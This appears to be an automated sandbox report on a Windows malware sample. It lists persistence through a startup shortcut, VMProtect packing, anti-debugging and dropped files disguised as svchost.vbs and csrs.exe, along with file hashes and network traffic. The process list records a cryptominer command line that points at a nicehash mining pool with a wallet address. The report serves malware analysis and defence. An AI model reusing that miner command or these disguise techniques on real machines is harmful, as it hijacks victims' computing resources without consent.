Analysis Overview
SHA256
c8fe094489bbbe929b676647dea128e9ef251d7babe7b6b67ee98d503eb33174
Threat Level: Shows suspicious behavior
The file 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118 was found to show suspicious behavior.
Malicious Activity Summary
Loads dropped DLL
Checks computer location settings
Drops startup file
Executes dropped EXE
VMProtect packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-20 15:54
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-20 15:54
Reported
2024-05-20 15:57
Platform
win7-20240221-en
Max time kernel
150s
Max time network
122s
Command Line
Signatures
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe | N/A |
Executes dropped EXE
Loads dropped DLL
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 15
Network
Files
C:\ProgramData\Windows\svchost.vbs
| MD5 | f4b667fe8d75278dffe4fa57d5b7212c |
| SHA1 | 05bc96683ea77d081fedcd810c4de7e9c5bb833a |
| SHA256 | 4f1a7ce0e5031763d94e774ce4fbe096e9ad0058abb5d209988dbf375a5ec922 |
| SHA512 | 52e2113bf234ea03c933d57030326e850847558ad7b195f74a99fa0d23e9857cb0e273a52a45602663462ee0bd9fee017e76e67b5a68c748e286b36d60ba6d41 |
C:\ProgramData\Windows\csrs.exe
| MD5 | e3427d9f439aebefa3d9c299e2a94af3 |
| SHA1 | ffff4672790378677ec30d3634fc593c10dfd37e |
| SHA256 | 7374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba |
| SHA512 | a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-20 15:54
Reported
2024-05-20 15:57
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
106s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe | N/A |
Executes dropped EXE
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
C:\ProgramData\Windows\csrs.exe
"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 11
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\ProgramData\Windows\svchost.vbs
| MD5 | f4b667fe8d75278dffe4fa57d5b7212c |
| SHA1 | 05bc96683ea77d081fedcd810c4de7e9c5bb833a |
| SHA256 | 4f1a7ce0e5031763d94e774ce4fbe096e9ad0058abb5d209988dbf375a5ec922 |
| SHA512 | 52e2113bf234ea03c933d57030326e850847558ad7b195f74a99fa0d23e9857cb0e273a52a45602663462ee0bd9fee017e76e67b5a68c748e286b36d60ba6d41 |
C:\ProgramData\Windows\csrs.exe
| MD5 | e3427d9f439aebefa3d9c299e2a94af3 |
| SHA1 | ffff4672790378677ec30d3634fc593c10dfd37e |
| SHA256 | 7374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba |
| SHA512 | a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b |